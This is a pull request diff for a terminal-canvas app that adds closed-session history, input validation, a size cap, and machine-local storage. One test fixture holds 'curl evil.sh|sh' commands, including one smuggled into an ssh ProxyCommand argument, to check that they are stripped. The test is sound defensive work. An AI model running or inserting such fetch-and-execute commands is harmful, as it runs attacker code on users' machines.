### PR TITLE
feat: closed sessions & windows history

### DIFF
--- a/src/core/workspace-files.closed-history.test.ts
+++ b/src/core/workspace-files.closed-history.test.ts
@@ -1,5 +1,6 @@
 import { describe, it, expect } from 'vitest'
 import { projectToFile, fileToProject, validClosedSessions } from './workspace-files'
+import { CLOSED_SESSIONS_CAP } from '../shared/types'
 import type { ClosedSessionEntry, Project } from '../shared/types'
 
 const closedEntry = (id: string, over: Partial<ClosedSessionEntry['node']> = {}): ClosedSessionEntry => ({
@@ -66,5 +67,54 @@ describe('closedSessions round trip', () => {
     expect(validClosedSessions([{ id: 'e1' }])).toBe(false) // missing closedAt/node
     expect(validClosedSessions('nope')).toBe(false)
     expect(validClosedSessions(undefined)).toBe(false)
+  })
+
+  // recreateNodeFromSnapshot assigns `node.position = reattach ? snapshot.position :
+  // snapshot.absolutePosition` UNGUARDED, and React Flow's adoptUserNodes then dereferences
+  // `position.x`. So an entry missing either point is not a cosmetic defect — it is a white-screen
+  // renderer crash reachable from any committed project.json. Reject it at the boundary.
+  it('validClosedSessions rejects an entry with no absolutePosition', () => {
+    const { absolutePosition: _dropped, ...noAbs } = closedEntry('e1')
+    expect(validClosedSessions([noAbs])).toBe(false)
+    expect(validClosedSessions([{ ...closedEntry('e1'), absolutePosition: { x: 1 } }])).toBe(false)
+    expect(validClosedSessions([{ ...closedEntry('e1'), absolutePosition: 'nope' }])).toBe(false)
+  })
+
+  it('validClosedSessions rejects an entry whose node has no position', () => {
+    const bad = closedEntry('e1')
+    const { position: _dropped, ...node } = bad.node
+    expect(validClosedSessions([{ ...bad, node }])).toBe(false)
+  })
+
+  // A garbage kind reaches buildBase's switch, returns null, and the sidebar row silently consumes
+  // itself and vanishes — the same dead-row failure the `trigger` exclusion was added to prevent.
+  it('validClosedSessions rejects an entry with a missing or empty node kind', () => {
+    expect(validClosedSessions([closedEntry('e1', { kind: '' as never })])).toBe(false)
+    expect(validClosedSessions([closedEntry('e1', { kind: undefined as never })])).toBe(false)
+    expect(validClosedSessions([closedEntry('e1', { kind: 7 as never })])).toBe(false)
+  })
+
+  it('a file whose entry lacks position data loads as no history at all, never a broken entry', () => {
+    const file = projectToFile(project({ closedSessions: [closedEntry('e1')] }), 1, 'now')
+    const { absolutePosition: _dropped, ...maimed } = file.closedSessions![0]
+    const hostile = { ...file, closedSessions: [maimed] } as never
+    expect(fileToProject(hostile, { id: 'p1' }).closedSessions).toBeUndefined()
+  })
+
+  // The cap is enforced where entries are ADMITTED, not only where we append them: the file is
+  // git-shared, so an inflated list arrives from outside and would otherwise render unbounded
+  // sidebar rows and be written back in full.
+  it('caps an oversized closedSessions array on read AND on write', () => {
+    const many = Array.from({ length: CLOSED_SESSIONS_CAP + 12 }, (_, i) => closedEntry(`e${i}`))
+
+    const file = projectToFile(project({ closedSessions: many }), 1, 'now')
+    expect(file.closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
+
+    // A file that arrived already oversized (hand-edited, or written by a build before the cap).
+    const oversized = { ...file, closedSessions: many } as never
+    const loaded = fileToProject(oversized, { id: 'p1' })
+    expect(loaded.closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
+    // Newest-first order is preserved — the cap drops the TAIL, never the head.
+    expect(loaded.closedSessions?.[0].id).toBe('e0')
   })
 })

--- a/src/core/workspace-files.closed-history.test.ts
+++ b/src/core/workspace-files.closed-history.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest'
-import { projectToFile, fileToProject, validClosedSessions } from './workspace-files'
+import { projectToFile, fileToProject, validClosedSessions, sanitizeLoadedClosedSessions } from './workspace-files'
 import { CLOSED_SESSIONS_CAP } from '../shared/types'
 import type { ClosedSessionEntry, Project } from '../shared/types'
 
@@ -17,52 +17,39 @@ const project = (over: Partial<Project> = {}): Project => ({
   id: 'p1', name: 'foo', color: '#7aa2f7', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [], ...over
 })
 
-describe('closedSessions round trip', () => {
-  it('projectToFile omits an absent/empty closedSessions', () => {
-    const file = projectToFile(project(), 1, 'now')
-    expect(file.closedSessions).toBeUndefined()
-  })
-
-  it('round-trips id/closedAt/cosmetic fields, portable-izing cwd under the project root', () => {
+describe('closedSessions is machine-local, never in the shared project file', () => {
+  it('projectToFile never emits closedSessions, even when the project carries entries', () => {
     const entries = [closedEntry('e1'), closedEntry('e2')]
     const file = projectToFile(project({ cwd: '/tmp/x', closedSessions: entries }), 1, 'now')
-    // The FILE stores a portable cwd, same as a live node's would — never the absolute path.
-    expect(file.closedSessions?.[0].node.cwd).toBe('.')
-    expect(file.closedSessions?.map((e) => e.id)).toEqual(['e1', 'e2'])
+    expect((file as { closedSessions?: unknown }).closedSessions).toBeUndefined()
+    expect(JSON.stringify(file)).not.toContain('closedSessions')
+  })
 
-    const loaded = fileToProject(file, { id: 'p1', cwd: '/tmp/x' })
-    // Resolved back to absolute against THIS load's cwd — round-trips to the original.
+  it('fileToProject ignores a `closedSessions` field forged onto the file — only base.closedSessions counts', () => {
+    const file = projectToFile(project({ cwd: '/tmp/x' }), 1, 'now')
+    const forged = { ...file, closedSessions: [closedEntry('forged')] } as never
+    expect(fileToProject(forged, { id: 'p1', cwd: '/tmp/x' }).closedSessions).toBeUndefined()
+  })
+
+  it('fileToProject surfaces base.closedSessions verbatim (already sanitized by the caller)', () => {
+    const file = projectToFile(project({ cwd: '/tmp/x' }), 1, 'now')
+    const entries = [closedEntry('e1'), closedEntry('e2')]
+    const loaded = fileToProject(file, { id: 'p1', cwd: '/tmp/x', closedSessions: entries })
+    expect(loaded.closedSessions?.map((e) => e.id)).toEqual(['e1', 'e2'])
+    // Unlike the shared-file path, this data never leaves the machine — no exec-strip, no
+    // cwd-portability rewrite. It rides straight through.
     expect(loaded.closedSessions?.[0].node.cwd).toBe('/tmp/x')
-    expect(loaded.closedSessions?.[0].node.title).toBe('shell')
-    expect(loaded.closedSessions?.[0].closedAt).toBe(1000)
   })
 
-  it('strips shell and ssh.extraArgs/execTrusted from the file, never restoring them without a local record', () => {
-    const dangerous = closedEntry('e1', {
-      shell: 'curl evil.sh|sh',
-      ssh: { host: 'h', user: 'u', extraArgs: ['-oProxyCommand=curl evil.sh|sh'], execTrusted: true } as never
-    })
-    const file = projectToFile(project({ closedSessions: [dangerous] }), 1, 'now')
-    expect(file.closedSessions?.[0].node.shell).toBeUndefined()
-    expect((file.closedSessions?.[0].node.ssh as { extraArgs?: unknown })?.extraArgs).toBeUndefined()
-    expect((file.closedSessions?.[0].node.ssh as { execTrusted?: unknown })?.execTrusted).toBeUndefined()
-
-    // No matching entry in this machine's localExec map ⇒ stays stripped on read too.
-    const loaded = fileToProject(file, { id: 'p1' })
-    expect(loaded.closedSessions?.[0].node.shell).toBeUndefined()
-    expect((loaded.closedSessions?.[0].node.ssh as { extraArgs?: unknown })?.extraArgs).toBeUndefined()
+  it('omits closedSessions entirely when base carries none', () => {
+    const file = projectToFile(project({ cwd: '/tmp/x' }), 1, 'now')
+    expect(fileToProject(file, { id: 'p1', cwd: '/tmp/x' }).closedSessions).toBeUndefined()
+    expect(fileToProject(file, { id: 'p1', cwd: '/tmp/x', closedSessions: [] }).closedSessions).toBeUndefined()
   })
+})
 
-  it('fileToProject drops a missing or malformed closedSessions to undefined', () => {
-    const file = projectToFile(project(), 1, 'now')
-    const loaded = fileToProject(file, { id: 'p1', cwd: '/tmp/x' })
-    expect(loaded.closedSessions).toBeUndefined()
-
-    const malformed = { ...file, closedSessions: { not: 'an array' } } as never
-    expect(fileToProject(malformed, { id: 'p1', cwd: '/tmp/x' }).closedSessions).toBeUndefined()
-  })
-
-  it('validClosedSessions accepts a well-formed array and rejects garbage', () => {
+describe('validClosedSessions', () => {
+  it('accepts a well-formed array and rejects garbage', () => {
     expect(validClosedSessions([closedEntry('e1')])).toBe(true)
     expect(validClosedSessions([{ id: 'e1' }])).toBe(false) // missing closedAt/node
     expect(validClosedSessions('nope')).toBe(false)
@@ -72,15 +59,15 @@ describe('closedSessions round trip', () => {
   // recreateNodeFromSnapshot assigns `node.position = reattach ? snapshot.position :
   // snapshot.absolutePosition` UNGUARDED, and React Flow's adoptUserNodes then dereferences
   // `position.x`. So an entry missing either point is not a cosmetic defect — it is a white-screen
-  // renderer crash reachable from any committed project.json. Reject it at the boundary.
-  it('validClosedSessions rejects an entry with no absolutePosition', () => {
+  // renderer crash reachable from a hand-edited workspace.json. Reject it at the boundary.
+  it('rejects an entry with no absolutePosition', () => {
     const { absolutePosition: _dropped, ...noAbs } = closedEntry('e1')
     expect(validClosedSessions([noAbs])).toBe(false)
     expect(validClosedSessions([{ ...closedEntry('e1'), absolutePosition: { x: 1 } }])).toBe(false)
     expect(validClosedSessions([{ ...closedEntry('e1'), absolutePosition: 'nope' }])).toBe(false)
   })
 
-  it('validClosedSessions rejects an entry whose node has no position', () => {
+  it('rejects an entry whose node has no position', () => {
     const bad = closedEntry('e1')
     const { position: _dropped, ...node } = bad.node
     expect(validClosedSessions([{ ...bad, node }])).toBe(false)
@@ -88,33 +75,40 @@ describe('closedSessions round trip', () => {
 
   // A garbage kind reaches buildBase's switch, returns null, and the sidebar row silently consumes
   // itself and vanishes — the same dead-row failure the `trigger` exclusion was added to prevent.
-  it('validClosedSessions rejects an entry with a missing or empty node kind', () => {
+  it('rejects an entry with a missing or empty node kind', () => {
     expect(validClosedSessions([closedEntry('e1', { kind: '' as never })])).toBe(false)
     expect(validClosedSessions([closedEntry('e1', { kind: undefined as never })])).toBe(false)
     expect(validClosedSessions([closedEntry('e1', { kind: 7 as never })])).toBe(false)
   })
+})
 
-  it('a file whose entry lacks position data loads as no history at all, never a broken entry', () => {
-    const file = projectToFile(project({ closedSessions: [closedEntry('e1')] }), 1, 'now')
-    const { absolutePosition: _dropped, ...maimed } = file.closedSessions![0]
-    const hostile = { ...file, closedSessions: [maimed] } as never
-    expect(fileToProject(hostile, { id: 'p1' }).closedSessions).toBeUndefined()
+describe('sanitizeLoadedClosedSessions', () => {
+  it('drops a non-array/malformed value to undefined', () => {
+    expect(sanitizeLoadedClosedSessions({ not: 'an array' })).toBeUndefined()
+    expect(sanitizeLoadedClosedSessions(undefined)).toBeUndefined()
+    expect(sanitizeLoadedClosedSessions([])).toBeUndefined()
   })
 
-  // The cap is enforced where entries are ADMITTED, not only where we append them: the file is
-  // git-shared, so an inflated list arrives from outside and would otherwise render unbounded
-  // sidebar rows and be written back in full.
-  it('caps an oversized closedSessions array on read AND on write', () => {
+  it('a well-formed entry with no position data loads as no history at all, never a broken entry', () => {
+    const entry = closedEntry('e1')
+    const { absolutePosition: _dropped, ...maimed } = entry
+    expect(sanitizeLoadedClosedSessions([maimed])).toBeUndefined()
+  })
+
+  it('strips a trigger spec off a surviving entry\'s node, same as a live node', () => {
+    const entry = closedEntry('e1', { trigger: { kind: 'cron', expr: '* * * * *' } } as never)
+    const out = sanitizeLoadedClosedSessions([entry])
+    expect(out).toHaveLength(1)
+    expect(out?.[0].node.trigger).toBeUndefined()
+  })
+
+  // The cap is enforced where entries are ADMITTED, not only where we append them: workspace.json
+  // is hand-editable input too, so an inflated list can arrive from outside and would otherwise
+  // render unbounded sidebar rows and be persisted back in full on the next save.
+  it('caps an oversized array, newest-first (drops the tail)', () => {
     const many = Array.from({ length: CLOSED_SESSIONS_CAP + 12 }, (_, i) => closedEntry(`e${i}`))
-
-    const file = projectToFile(project({ closedSessions: many }), 1, 'now')
-    expect(file.closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
-
-    // A file that arrived already oversized (hand-edited, or written by a build before the cap).
-    const oversized = { ...file, closedSessions: many } as never
-    const loaded = fileToProject(oversized, { id: 'p1' })
-    expect(loaded.closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
-    // Newest-first order is preserved — the cap drops the TAIL, never the head.
-    expect(loaded.closedSessions?.[0].id).toBe('e0')
+    const out = sanitizeLoadedClosedSessions(many)
+    expect(out).toHaveLength(CLOSED_SESSIONS_CAP)
+    expect(out?.[0].id).toBe('e0')
   })
 })

--- a/src/core/workspace-files.closed-history.test.ts
+++ b/src/core/workspace-files.closed-history.test.ts
@@ -1,0 +1,70 @@
+import { describe, it, expect } from 'vitest'
+import { projectToFile, fileToProject, validClosedSessions } from './workspace-files'
+import type { ClosedSessionEntry, Project } from '../shared/types'
+
+const closedEntry = (id: string, over: Partial<ClosedSessionEntry['node']> = {}): ClosedSessionEntry => ({
+  id,
+  closedAt: 1000,
+  node: {
+    id: 'term-1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 400, height: 300 },
+    title: 'shell', color: '#fff', group: null, cwd: '/tmp/x', ...over
+  },
+  absolutePosition: { x: 0, y: 0 }
+})
+
+const project = (over: Partial<Project> = {}): Project => ({
+  id: 'p1', name: 'foo', color: '#7aa2f7', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [], ...over
+})
+
+describe('closedSessions round trip', () => {
+  it('projectToFile omits an absent/empty closedSessions', () => {
+    const file = projectToFile(project(), 1, 'now')
+    expect(file.closedSessions).toBeUndefined()
+  })
+
+  it('round-trips id/closedAt/cosmetic fields, portable-izing cwd under the project root', () => {
+    const entries = [closedEntry('e1'), closedEntry('e2')]
+    const file = projectToFile(project({ cwd: '/tmp/x', closedSessions: entries }), 1, 'now')
+    // The FILE stores a portable cwd, same as a live node's would — never the absolute path.
+    expect(file.closedSessions?.[0].node.cwd).toBe('.')
+    expect(file.closedSessions?.map((e) => e.id)).toEqual(['e1', 'e2'])
+
+    const loaded = fileToProject(file, { id: 'p1', cwd: '/tmp/x' })
+    // Resolved back to absolute against THIS load's cwd — round-trips to the original.
+    expect(loaded.closedSessions?.[0].node.cwd).toBe('/tmp/x')
+    expect(loaded.closedSessions?.[0].node.title).toBe('shell')
+    expect(loaded.closedSessions?.[0].closedAt).toBe(1000)
+  })
+
+  it('strips shell and ssh.extraArgs/execTrusted from the file, never restoring them without a local record', () => {
+    const dangerous = closedEntry('e1', {
+      shell: 'curl evil.sh|sh',
+      ssh: { host: 'h', user: 'u', extraArgs: ['-oProxyCommand=curl evil.sh|sh'], execTrusted: true } as never
+    })
+    const file = projectToFile(project({ closedSessions: [dangerous] }), 1, 'now')
+    expect(file.closedSessions?.[0].node.shell).toBeUndefined()
+    expect((file.closedSessions?.[0].node.ssh as { extraArgs?: unknown })?.extraArgs).toBeUndefined()
+    expect((file.closedSessions?.[0].node.ssh as { execTrusted?: unknown })?.execTrusted).toBeUndefined()
+
+    // No matching entry in this machine's localExec map ⇒ stays stripped on read too.
+    const loaded = fileToProject(file, { id: 'p1' })
+    expect(loaded.closedSessions?.[0].node.shell).toBeUndefined()
+    expect((loaded.closedSessions?.[0].node.ssh as { extraArgs?: unknown })?.extraArgs).toBeUndefined()
+  })
+
+  it('fileToProject drops a missing or malformed closedSessions to undefined', () => {
+    const file = projectToFile(project(), 1, 'now')
+    const loaded = fileToProject(file, { id: 'p1', cwd: '/tmp/x' })
+    expect(loaded.closedSessions).toBeUndefined()
+
+    const malformed = { ...file, closedSessions: { not: 'an array' } } as never
+    expect(fileToProject(malformed, { id: 'p1', cwd: '/tmp/x' }).closedSessions).toBeUndefined()
+  })
+
+  it('validClosedSessions accepts a well-formed array and rejects garbage', () => {
+    expect(validClosedSessions([closedEntry('e1')])).toBe(true)
+    expect(validClosedSessions([{ id: 'e1' }])).toBe(false) // missing closedAt/node
+    expect(validClosedSessions('nope')).toBe(false)
+    expect(validClosedSessions(undefined)).toBe(false)
+  })
+})

--- a/src/core/workspace-files.ts
+++ b/src/core/workspace-files.ts
@@ -143,6 +143,8 @@ export interface IndexEntryV3 {
   name: string
   color: string
   closed?: boolean
+  /** Set alongside `closed: true` — see `Project.closedAt`. */
+  closedAt?: number
   /** MACHINE-LOCAL camera for a ref'd project (local folder or ssh). Where this user is looking is
    *  not something a repo shares — the file's copy churned the git diff on every pan. */
   viewport?: Viewport
@@ -334,6 +336,7 @@ export function fileToProject(
     cwd?: string
     ssh?: Project['ssh']
     closed?: boolean
+    closedAt?: number
     /** This machine's camera. Falls back to the file's legacy one (a pre-change file, or a
      *  teammate's) and then to a frame that puts the canvas on screen. */
     viewport?: Viewport
@@ -397,6 +400,7 @@ export function fileToProject(
     ...(base.cwd ? { cwd: base.cwd } : {}),
     ...(base.ssh ? { ssh: base.ssh } : {}),
     ...(base.closed ? { closed: true } : {}),
+    ...(base.closedAt ? { closedAt: base.closedAt } : {}),
     // Machine-local, from the index entry ONLY: a file field named `capabilityAck` is a forgery
     // attempt (the shared file cannot carry this machine's consent) and is simply never read.
     ...(base.capabilityAck ? { capabilityAck: base.capabilityAck } : {}),
@@ -479,7 +483,11 @@ export function splitWorkspace(
       : incoming.id
     seenIds.add(id)
     const p = id === incoming.id ? incoming : { ...incoming, id }
-    const header = { id: p.id, name: p.name, color: p.color, ...(p.closed ? { closed: true } : {}) }
+    const header = {
+      id: p.id, name: p.name, color: p.color,
+      ...(p.closed ? { closed: true } : {}),
+      ...(p.closedAt ? { closedAt: p.closedAt } : {})
+    }
     // The machine-local half of a REF'd project (a folder or an ssh endpoint), which used to ride
     // the shared file: this user's camera and this machine's default managed account. Deliberately
     // NOT added to the `unavailable` branch below — a placeholder's viewport is the {0,0,1} of an

--- a/src/core/workspace-files.ts
+++ b/src/core/workspace-files.ts
@@ -7,6 +7,7 @@ import {
   stripSharedNodeExec,
   type LocalNodeExecMap
 } from '../shared/node-exec'
+import { CLOSED_SESSIONS_CAP } from '../shared/types'
 import type { BridgeLink, CanvasNodeState, ClosedSessionEntry, NavStop, Project, ProjectKanban, Viewport, Workspace } from '../shared/types'
 import { projectCapabilityFields, readProjectCapabilities } from '../shared/project-capabilities'
 import { loadedAgentBrowserPartition } from '../shared/browser-partition'
@@ -258,8 +259,11 @@ export function projectToFile(
   const nodes = sanitizeNodeTriggers(
     stripSharedNodeExec(p.cwd ? toPortableNodes(p.nodes, p.cwd) : p.nodes)
   )
+  // Capped on the way OUT as well as in (see CLOSED_SESSIONS_CAP): the store mutator guarantees
+  // this in normal operation, but an in-memory list inflated some other way (a hand-edited file
+  // loaded before the cap existed, a future caller) must not be written back uncapped.
   const closedSessions = p.closedSessions?.length
-    ? p.closedSessions.map((e) => ({
+    ? p.closedSessions.slice(0, CLOSED_SESSIONS_CAP).map((e) => ({
         ...e,
         node: sanitizeNodeTriggers(
           stripSharedNodeExec(p.cwd ? toPortableNodes([e.node], p.cwd) : [e.node])
@@ -302,21 +306,40 @@ export function validKanban(k: unknown): k is ProjectKanban {
   )
 }
 
-/** Tolerant-reader guard for `closedSessions`, same shallow-shape rule as `validKanban`: anything
- *  that isn't an array of `{id, closedAt, node}` objects is dropped rather than trusted, so a
- *  legacy/hand-edited file degrades to no history instead of crashing. */
+/** A `{x, y}` point, checked at the boundary because the file is hostile input. */
+function validPoint(p: unknown): p is { x: number; y: number } {
+  return (
+    !!p &&
+    typeof p === 'object' &&
+    typeof (p as { x: unknown }).x === 'number' &&
+    typeof (p as { y: unknown }).y === 'number'
+  )
+}
+
+/**
+ * Tolerant-reader guard for `closedSessions`, same "drop it rather than trust it" rule as
+ * `validKanban`: a legacy/hand-edited/hostile file degrades to no history instead of crashing.
+ *
+ * The POSITION fields are not optional politeness — they are the crash. `recreateNodeFromSnapshot`
+ * assigns `node.position = reattach ? snapshot.position : snapshot.absolutePosition` UNGUARDED, so
+ * an entry missing either one hands React Flow a node with `position: undefined`, and
+ * `adoptUserNodes` dereferences `position.x` — a white-screen renderer crash from a file anyone can
+ * commit. `kind` is checked for the sibling failure: a garbage kind reaches `buildBase`'s switch,
+ * returns null, and the row silently consumes itself and vanishes (`buildBase` already `return
+ * null`s for anything unknown, so a non-empty string is enough here — no NodeKind enum copy).
+ */
 export function validClosedSessions(x: unknown): x is ClosedSessionEntry[] {
   return (
     Array.isArray(x) &&
-    x.every(
-      (e) =>
-        !!e &&
-        typeof e === 'object' &&
-        typeof (e as ClosedSessionEntry).id === 'string' &&
-        typeof (e as ClosedSessionEntry).closedAt === 'number' &&
-        !!(e as ClosedSessionEntry).node &&
-        typeof (e as ClosedSessionEntry).node === 'object'
-    )
+    x.every((e) => {
+      if (!e || typeof e !== 'object') return false
+      const entry = e as ClosedSessionEntry
+      if (typeof entry.id !== 'string' || typeof entry.closedAt !== 'number') return false
+      if (!validPoint(entry.absolutePosition)) return false
+      const node = entry.node as CanvasNodeState | undefined
+      if (!node || typeof node !== 'object') return false
+      return typeof node.kind === 'string' && node.kind.length > 0 && validPoint(node.position)
+    })
   )
 }
 
@@ -381,9 +404,12 @@ export function fileToProject(
     ...readProjectCapabilities(f),
     ...(f.dinoHighScore ? { dinoHighScore: f.dinoHighScore } : {}),
     ...(validKanban(f.kanban) ? { kanban: f.kanban } : {}),
+    // Capped at the READ boundary, which is the one that matters: the file is git-shared, so an
+    // oversized list arrives from outside and would otherwise render unbounded sidebar rows and be
+    // rewritten in full. See CLOSED_SESSIONS_CAP.
     ...(validClosedSessions(f.closedSessions)
       ? {
-          closedSessions: f.closedSessions.map((e) => ({
+          closedSessions: f.closedSessions.slice(0, CLOSED_SESSIONS_CAP).map((e) => ({
             ...e,
             node: sanitizeNodeTriggers(
               sanitizeBrowserPartitions(

--- a/src/core/workspace-files.ts
+++ b/src/core/workspace-files.ts
@@ -7,7 +7,7 @@ import {
   stripSharedNodeExec,
   type LocalNodeExecMap
 } from '../shared/node-exec'
-import type { BridgeLink, CanvasNodeState, NavStop, Project, ProjectKanban, Viewport, Workspace } from '../shared/types'
+import type { BridgeLink, CanvasNodeState, ClosedSessionEntry, NavStop, Project, ProjectKanban, Viewport, Workspace } from '../shared/types'
 import { projectCapabilityFields, readProjectCapabilities } from '../shared/project-capabilities'
 import { loadedAgentBrowserPartition } from '../shared/browser-partition'
 import { sanitizeProjectIcon, type ProjectIcon } from '../shared/project-icon'
@@ -123,6 +123,8 @@ export interface ProjectFileV1 {
   agentMessaging?: boolean
   dinoHighScore?: number
   kanban?: ProjectKanban
+  /** Git-shared closed-session history — see `Project.closedSessions`. */
+  closedSessions?: ClosedSessionEntry[]
 }
 
 /** One workspace.json v3 entry. Exactly one of: `cwd` (local ref), `ssh` (remote ref),
@@ -254,6 +256,14 @@ export function projectToFile(
   const nodes = sanitizeNodeTriggers(
     stripSharedNodeExec(p.cwd ? toPortableNodes(p.nodes, p.cwd) : p.nodes)
   )
+  const closedSessions = p.closedSessions?.length
+    ? p.closedSessions.map((e) => ({
+        ...e,
+        node: sanitizeNodeTriggers(
+          stripSharedNodeExec(p.cwd ? toPortableNodes([e.node], p.cwd) : [e.node])
+        )[0]
+      }))
+    : undefined
   const icon = sanitizeProjectIcon(p.icon)
   return {
     version: 1,
@@ -273,7 +283,8 @@ export function projectToFile(
     // the acknowledgment is machine-local (IndexEntryV3.capabilityAck) and must never travel.
     ...projectCapabilityFields(p),
     ...(p.dinoHighScore ? { dinoHighScore: p.dinoHighScore } : {}),
-    ...(p.kanban ? { kanban: p.kanban } : {})
+    ...(p.kanban ? { kanban: p.kanban } : {}),
+    ...(closedSessions ? { closedSessions } : {})
   }
 }
 
@@ -286,6 +297,24 @@ export function validKanban(k: unknown): k is ProjectKanban {
     !!k &&
     Array.isArray((k as ProjectKanban).columns) &&
     Array.isArray((k as ProjectKanban).assignments)
+  )
+}
+
+/** Tolerant-reader guard for `closedSessions`, same shallow-shape rule as `validKanban`: anything
+ *  that isn't an array of `{id, closedAt, node}` objects is dropped rather than trusted, so a
+ *  legacy/hand-edited file degrades to no history instead of crashing. */
+export function validClosedSessions(x: unknown): x is ClosedSessionEntry[] {
+  return (
+    Array.isArray(x) &&
+    x.every(
+      (e) =>
+        !!e &&
+        typeof e === 'object' &&
+        typeof (e as ClosedSessionEntry).id === 'string' &&
+        typeof (e as ClosedSessionEntry).closedAt === 'number' &&
+        !!(e as ClosedSessionEntry).node &&
+        typeof (e as ClosedSessionEntry).node === 'object'
+    )
   )
 }
 
@@ -349,6 +378,22 @@ export function fileToProject(
     ...readProjectCapabilities(f),
     ...(f.dinoHighScore ? { dinoHighScore: f.dinoHighScore } : {}),
     ...(validKanban(f.kanban) ? { kanban: f.kanban } : {}),
+    ...(validClosedSessions(f.closedSessions)
+      ? {
+          closedSessions: f.closedSessions.map((e) => ({
+            ...e,
+            node: sanitizeNodeTriggers(
+              sanitizeBrowserPartitions(
+                applyLocalNodeExec(
+                  base.cwd ? resolveNodes([e.node], base.cwd) : [e.node],
+                  base.localExec
+                ),
+                base.id
+              )
+            )[0]
+          }))
+        }
+      : {}),
     ...(base.cwd ? { cwd: base.cwd } : {}),
     ...(base.ssh ? { ssh: base.ssh } : {}),
     ...(base.closed ? { closed: true } : {}),

--- a/src/core/workspace-files.ts
+++ b/src/core/workspace-files.ts
@@ -124,8 +124,8 @@ export interface ProjectFileV1 {
   agentMessaging?: boolean
   dinoHighScore?: number
   kanban?: ProjectKanban
-  /** Git-shared closed-session history — see `Project.closedSessions`. */
-  closedSessions?: ClosedSessionEntry[]
+  // NOTE: closedSessions is deliberately NOT here — see `Project.closedSessions` /
+  // `IndexEntryV3.closedSessions`. It is machine-local, like `viewport`/`breadcrumbs`.
 }
 
 /** One workspace.json v3 entry. Exactly one of: `cwd` (local ref), `ssh` (remote ref),
@@ -162,6 +162,15 @@ export interface IndexEntryV3 {
   /** MACHINE-LOCAL camera navigation history for a ref'd project. Same rule as `viewport`: this
    *  user's "where was I" is not something a repo shares. See NavStop. */
   breadcrumbs?: NavStop[]
+  /**
+   * MACHINE-LOCAL closed-session history for a ref'd project (folder or ssh) — see
+   * `Project.closedSessions`. Whose trash can holds what deleted nodes is a per-machine fact, not
+   * shared content: a delete's full node-state blob would otherwise churn a committed,
+   * teammate-visible `.nodeterm/project.json` on every one. Validated/capped/trigger-sanitized on
+   * every load (`sanitizeLoadedClosedSessions`) exactly like an inline project's embedded
+   * `closedSessions` — this file is hand-editable input too.
+   */
+  closedSessions?: ClosedSessionEntry[]
   cwd?: string
   ssh?: Project['ssh']
   cache?: ProjectFileV1
@@ -259,17 +268,6 @@ export function projectToFile(
   const nodes = sanitizeNodeTriggers(
     stripSharedNodeExec(p.cwd ? toPortableNodes(p.nodes, p.cwd) : p.nodes)
   )
-  // Capped on the way OUT as well as in (see CLOSED_SESSIONS_CAP): the store mutator guarantees
-  // this in normal operation, but an in-memory list inflated some other way (a hand-edited file
-  // loaded before the cap existed, a future caller) must not be written back uncapped.
-  const closedSessions = p.closedSessions?.length
-    ? p.closedSessions.slice(0, CLOSED_SESSIONS_CAP).map((e) => ({
-        ...e,
-        node: sanitizeNodeTriggers(
-          stripSharedNodeExec(p.cwd ? toPortableNodes([e.node], p.cwd) : [e.node])
-        )[0]
-      }))
-    : undefined
   const icon = sanitizeProjectIcon(p.icon)
   return {
     version: 1,
@@ -289,8 +287,7 @@ export function projectToFile(
     // the acknowledgment is machine-local (IndexEntryV3.capabilityAck) and must never travel.
     ...projectCapabilityFields(p),
     ...(p.dinoHighScore ? { dinoHighScore: p.dinoHighScore } : {}),
-    ...(p.kanban ? { kanban: p.kanban } : {}),
-    ...(closedSessions ? { closedSessions } : {})
+    ...(p.kanban ? { kanban: p.kanban } : {})
   }
 }
 
@@ -344,6 +341,24 @@ export function validClosedSessions(x: unknown): x is ClosedSessionEntry[] {
 }
 
 /**
+ * The tolerant reader for closed-session history wherever it is admitted from disk: an
+ * `IndexEntryV3.closedSessions` (ref'd project) or an inline `IndexEntryV3.project.closedSessions`
+ * — both live in workspace.json, which is hand-editable input exactly like a git-shared
+ * `.nodeterm/project.json`. Validates shape (`validClosedSessions`), caps at `CLOSED_SESSIONS_CAP`
+ * (newest-first — the cap drops the tail), and re-normalizes each snapshot's trigger spec, same as
+ * a live node. No exec-strip / browser-partition treatment here: unlike the shared project file,
+ * this data never leaves this machine, so a node's own `shell`/`ssh.extraArgs` survive a reopen
+ * intact — there is nothing to re-attach from a separate machine-local map. Returns `undefined`
+ * for anything that fails the shape guard or has nothing to admit, never `[]`.
+ */
+export function sanitizeLoadedClosedSessions(x: unknown): ClosedSessionEntry[] | undefined {
+  if (!validClosedSessions(x)) return undefined
+  const capped = x.slice(0, CLOSED_SESSIONS_CAP)
+  if (!capped.length) return undefined
+  return capped.map((e) => ({ ...e, node: sanitizeNodeTriggers([e.node])[0] }))
+}
+
+/**
  * The shared file plus this machine's own half of the project.
  *
  * `base.id` is REQUIRED and never defaulted from the file: identity comes from the index entry
@@ -369,6 +384,9 @@ export function fileToProject(
     capabilityAck?: import('../shared/project-capability-consent').CapabilityAckMap
     /** This machine's navigation history for this entry (never from the file). */
     breadcrumbs?: NavStop[]
+    /** This machine's closed-session history for this entry (never from the file) — already
+     *  validated/capped/trigger-sanitized by the caller (`sanitizeLoadedClosedSessions`). */
+    closedSessions?: ClosedSessionEntry[]
     /** This machine's own exec values for these nodes (from the local index entry). A file read
      *  WITHOUT them — an adopted/cloned folder, a probe — gets the safe defaults, never the file's
      *  own `shell`/`ssh.extraArgs`. */
@@ -404,25 +422,6 @@ export function fileToProject(
     ...readProjectCapabilities(f),
     ...(f.dinoHighScore ? { dinoHighScore: f.dinoHighScore } : {}),
     ...(validKanban(f.kanban) ? { kanban: f.kanban } : {}),
-    // Capped at the READ boundary, which is the one that matters: the file is git-shared, so an
-    // oversized list arrives from outside and would otherwise render unbounded sidebar rows and be
-    // rewritten in full. See CLOSED_SESSIONS_CAP.
-    ...(validClosedSessions(f.closedSessions)
-      ? {
-          closedSessions: f.closedSessions.slice(0, CLOSED_SESSIONS_CAP).map((e) => ({
-            ...e,
-            node: sanitizeNodeTriggers(
-              sanitizeBrowserPartitions(
-                applyLocalNodeExec(
-                  base.cwd ? resolveNodes([e.node], base.cwd) : [e.node],
-                  base.localExec
-                ),
-                base.id
-              )
